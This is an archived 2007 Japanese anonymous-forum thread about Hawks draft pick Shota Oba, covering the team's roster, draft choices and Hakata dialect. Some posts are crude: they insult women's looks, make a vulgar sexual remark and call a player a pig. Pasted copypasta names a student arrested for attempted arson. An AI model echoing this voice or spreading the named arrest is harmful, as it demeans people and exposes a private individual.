さすがに現時点での評価は新垣や大隣のほうが上かなー。
大隣は一年中継ぎやってみてもいいと思う。あの素材にはもったいないけど。

170 :代打名無し@実況は実況板で:2007/11/26(月) 00:12:18 ID:WTkpZr25O
ホークスは投手より捕手と打線が変わらないかぎり変わらないような気がする。
松中、小久保、多村三人揃って怪我だらけだし

171 :代打名無し@実況は実況板で:2007/11/26(月) 00:15:49 ID:DChSqvlSO
彼女いるとしたら東京と福岡で遠距離恋愛するのかな?

172 :代打名無し@実況は実況板で:2007/11/26(月) 00:42:26 ID:vWU8K9r/0
>>171
まあ、そうだろうけど、現実、長続きはしないと思う。
若田部みたいに地元の女子アナと結婚するんじゃないの?
複数団競合、関東出身、東都の記録保持者、風貌など、何となく
大場と若田部は境遇が似てるから。

173 :代打名無し@実況は実況板で:2007/11/26(月) 02:09:32 ID:WTkpZr25O
福岡の女子アナってTNC以外はブスばっかりだよ。



174 :代打名無し@実況は実況板で:2007/11/26(月) 18:32:24 ID:WTkpZr25O
福岡のスーパーニュースでこの前の大場インタビューキタワァ

175 :代打名無し@実況は実況板で:2007/11/26(月) 19:01:10 ID:CJ8+ghiO0
>>171
俺と結婚してくれんだろ

176 :代打名無し@実況は実況板で:2007/11/26(月) 21:15:22 ID:WTkpZr25O
>>175
大場アッー!

177 :代打名無し@実況は実況板で:2007/11/27(火) 01:49:29 ID:qTina80B0
福岡は博多弁なの?関西だと、ホテルやコールセンターなども
標準語で話しているつもりでも、イントネーションが全然違う。
シャイで内気な大場は博多弁の嵐の中で大丈夫なのか?
博多弁って”よか〜””〜ばい””〜けん””〜たい””〜やろ”とか?


178 :名無しさん@実況は実況板で:2007/11/27(火) 01:56:15 ID:xndsQ/hc0
「大場は確かにA級だよ、でも去年の大隣はS級だ」

何日か前のスポニチ九州版のコラムに載ってたスカウトの話
大隣の二の舞は勘弁

179 :代打名無し@実況は実況板で:2007/11/27(火) 02:06:51 ID:F+IaU4CfO
>>177
イントネーションは標準語に近い
神戸生まれ広島、鹿児島経由福岡育ちの俺の感想だと
西日本で1番なまりが少ないと思う
語尾に〜と。〜くさ。とはよく使うけど

180 :代打名無し@実況は実況板で:2007/11/27(火) 02:26:40 ID:qTina80B0
>>179
そうなんだ!テレビで天神の街頭インタビューなど聞いてると
関西は、マイク向けられて、全国放送でも関西弁だけど
福岡は、自分が聞いた限りは博多弁は分からなかった。
転勤族が多いからかな?ちなみに、札幌、仙台、新潟はほぼ標準語。
名古屋も一部を除けば、今は標準語に極めて近いね。
浅田真央や安藤美姫の名古屋人も、名古屋弁など聞いたこともないし。

181 :代打名無し@実況は実況板で:2007/11/27(火) 03:21:01 ID:/TabwztYO
博多弁はある意味、九州で一番言葉遣い悪いよ。

大隣とは仲良しらしいからチームとはすんなり溶け込めるんじゃない。

それにしてもホークスって新人も退寮するのが早いよね。
松田も本多ももう出たらしいし。

182 :代打名無し@実況は実況板で:2007/11/27(火) 11:56:02 ID:wjBauC1TO
すごく素直そうで優しそうでさわやかだよね。福岡で変な女にひっかからないといいけど。

183 :代打名無し@実況は実況板で:2007/11/27(火) 12:22:39 ID:xW6OpJRH0
>>179
イントネーションが標準語に近い→大嘘
西日本で1番なまりが少ないと→大嘘

184 :代打名無し@実況は実況板で:2007/11/27(火) 12:28:33 ID:Gv8aGzPf0
まあ実際はどこも訛ってるわな
関東でさえも訛ってるし

185 :代打名無し@実況は実況板で:2007/11/27(火) 12:54:54 ID:270f78tH0
うざったいてのは東京の方言だし

186 :代打名無し@実況は実況板で:2007/11/27(火) 13:52:52 ID:/TabwztYO
大場が中洲の風俗のネェチャンに変な博多弁吹き込まれないか心配だ。

187 :代打名無し@実況は実況板で:2007/11/27(火) 14:08:30 ID:+Hr5q8D00
>すごく素直そうで優しそうでさわやかだよね

イタタタタ


188 :代打名無し@実況は実況板で:2007/11/27(火) 20:02:08 ID:W0Vud11f0
>>186
そんなことしなくても、マンコにはこまらないだろ

189 :代打名無し@実況は実況板で:2007/11/27(火) 23:56:14 ID:aVlVZZ3t0
でも、今回の同期は1人を除き、みんな関東出身だね。
王も東京だし、明治の久米も大場と面識あるし、良かったかも。
しかし、SBは地域密着を謳いながら、関東勢で占めるとは??
都会派球団を目指したいのか?

190 :代打名無し@実況は実況板で:2007/11/28(水) 00:01:58 ID:aIrjZ9/v0
>>189
地元の白仁田、伊志峰を狙ってたけど大場が獲れてしまったので白仁田は狙ってた阪神が獲得。
更にウェーバーで藤原、伊志峰を先に獲られてはもう獲りたい九州出身者が殆どいなかった。

191 :代打名無し@実況は実況板で:2007/11/28(水) 00:20:02 ID:M07jeHZuO
大場は実は楽天に行きたかったみたいなレスがあったよね。
先輩の永井がいるし、田中もいるから一位指名してくれると思ってたら、長谷部を一位指名したからガッカリしたみたいな事かかれてた。



192 :代打名無し@実況は実況板で:2007/11/28(水) 00:36:58 ID:9rWhN/yk0
>>190
そうなのか。でも、東京みたいに寄せ集めの土地じゃないんだし
本来は地元中心で行った方が人気は出そうだけどね。SBは事実、
当初は白仁田を1位指名する予定でいたみたいだし。

>>191
永井とは大の仲良しだし、仙台は地方と言っても、東京に比較的近いしね。
新幹線で東京から1時間半くらいだし、夜行バスでも確か、6時間位で
5000円くらいで行ける。同じ東日本ということもあるし、言葉も
東北の中では標準語で話している貴重な地域だし、もの凄く大雑把に言えば
首都圏みたいな感じだから(東京に新幹線通勤も居るし)
条件的に合っていた。勿論、出番が多いからということもあるけど。

楽天は8月に1番乗りで大場指名を決めたと報道されたんだけどね。
その次がロッテだった。しかし、皮肉にもこの2球団が直前に回避して
安全策で長谷部に流れた。なので、本来は大場は8球団指名が濃厚だった。

193 :代打名無し@実況は実況板で:2007/11/28(水) 00:43:39 ID:4wAthWj00
>>192
そうなんですが、鷹のスカウトの方針が『その年の一番良い選手を狙う』が基本スタンスなんですよ。
ですから、毎年良い選手をどんな形であれ指名しています。
それに、毎年九州出身者は狙っていて獲得してます。
ただ、今回のドラフトでは九州出身者とは縁がなかったとしか言いようがないですね。

194 :代打名無し@実況は実況板で:2007/11/28(水) 00:57:22 ID:W8Lvo+O50
実はちゃんとした指名挨拶をしたのがホークスだけで、そのホークスが当てたというのもすごい話だな

195 :代打名無し@実況は実況板で:2007/11/28(水) 17:49:23 ID:M07jeHZuO
楽天は野村が若い選手を中心に使うから新人でも使われるチャンスは多いよね。
それはそうとホークスいい加減まとも捕手を取ってくれないとまた今年も楽天に負け越すような気がする。


196 :代打名無し@実況は実況板で:2007/11/28(水) 18:14:30 ID:vl7lDDLN0
age


197 :代打名無し@実況は実況板で:2007/11/28(水) 18:21:16 ID:0IUfcArS0
>>195
とりあえず打つ方は置いておいて的山じゃダメか?
あと高谷にも期待してるんだが

198 :代打名無し@実況は実況板で:2007/11/28(水) 19:36:03 ID:M07jeHZuO
正直、小久保や松中には期待できないよな。
松田とか本多とか若い選手がどんどん活躍してチームも若返ってほしい。


199 :代打名無し@実況は実況板で:2007/11/28(水) 23:23:58 ID:mIcrAK7Y0
おれも高谷に期待してる。
ぜひ正捕手に

200 :代打名無し@実況は実況板で:2007/11/28(水) 23:33:39 ID:Z8iGpp5z0
ここまでいい加減な捕手補強みてると
城島復帰が近い将来内定してるんじゃないかと思ってしまう

201 :代打名無し@実況は実況板で:2007/11/29(木) 03:54:30 ID:ya8u9q/l0
東洋大姫路で部内暴力

野球の秋季高校近畿大会で準々決勝に進出している東洋大姫路(兵庫)で部内暴力があり、日本高野連は24日、持ち回りの審議委員会で、同校の同大会出場には差し支えないとする応急措置を決めた。
日本高野連によると、9月19日の練習後、2年生部員1人が1年生部員1人を校則違反したとして、平手で数回たたいた。
同校は匿名の投書で事実を確認し、23日に兵庫県高野連に報告した。
問題の部員を大会の登録メンバーから外した。

http://www.sponichi.co.jp/baseball/flash/KFullFlash20071024033.html


202 :代打名無し@実況は実況板で:2007/11/29(木) 11:57:58 ID:KEar5OkvO
有名なわりには画像が少ないね。壁紙にしたいのに。

203 :代打名無し@実況は実況板で:2007/11/29(木) 15:30:13 ID:Azq86X2yO
>>201
大場と何の関係あるの?

204 :代打名無し@実況は実況板で:2007/11/29(木) 23:59:09 ID:SdvJP6dS0
>>203
1ヶ月以上も前から貼られているコピペ。

205 :代打名無し@実況は実況板で:2007/11/29(木) 23:59:59 ID:gaLO5yJb0
全く関係なし。


206 :代打名無し@実況は実況板で:2007/11/30(金) 09:21:55 ID://F+NX7l0

東洋大女子学生らが、バーベキューついでに中にホームレスが寝ているダンボールハウスに サラダ油で火

埼玉県警朝霞署は6日までに、ホームレスの男性が寝ていた段ボール箱の「家」にサラダ油をまき、放火しようとしたとして、東洋大4年の安藤佳南子容疑者(21)ら男女4人を器物損壊容疑で逮捕した。
安藤容疑者らは5日午前4時半過ぎ、東洋大学朝霞キャンパス近くの河川敷でバーベキューをしているうち「殺せ」「燃やせ」などと騒ぎ、この段ボールを“焼き打ち”しようとしたが、ライターのオイルが切れていたため着火しなかった。
この男性は「もうダメかと思った」と恐怖を振り返った。


207 :代打名無し@実況は実況板で:2007/11/30(金) 22:31:52 ID:OM6Ndbo10
大場あいしてう

208 :代打名無し@実況は実況板で:2007/12/01(土) 11:34:32 ID:+FFmWc3GO
今度の月刊ホークスの表紙はこの人かな?

209 :代打名無し@実況は実況板で:2007/12/01(土) 11:37:07 ID:7tpvbRpX0
大場特集はまだか

210 :代打名無し@実況は実況板で:2007/12/01(土) 11:44:28 ID:DaaW2ne5O
http://www.google.co.jp/gwt/n?u=http%3A%2F%2Fwww.freewebs.com%2Fyahoobb%2F&_gwt_pg=0&hl=ja&q=%E6%9C%9D%E9%AE%AE%E7%B7%8F%E9%80%A3+%E3%82%BD%E3%83%95%E3%83%88%E3%83%90%E3%83%B3%E3%82%AF&source=m&output=xhtml1_0&gsessionid=6lElZWzdLSU

211 :代打名無し@実況は実況板で:2007/12/01(土) 14:04:02 ID:g9yrMJf60
大場翔太の一年後↓
http://headlines.yahoo.co.jp/hl?a=20071201-00000002-nks_fl-base

212 :代打名無し@実況は実況板で:2007/12/02(日) 10:07:12 ID:z9xJncmPO
↑豚と一緒にしないで。

213 :代打名無し@実況は実況板で:2007/12/02(日) 14:32:04 ID:g5Pqy2z00
場ってつく人は大成しない気がする

214 :代打名無し@実況は実況板で:2007/12/02(日) 17:01:49 ID:1Tp1dIPy0
つ馬場正平

215 :代打名無し@実況は実況板で:2007/12/02(日) 17:42:53 ID:v38lCfiI0
ジャイアントパンダ

216 :代打名無し@実況は実況板で:2007/12/03(月) 20:37:51 ID:QMSbqyd70
大場あいしてるお

40 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)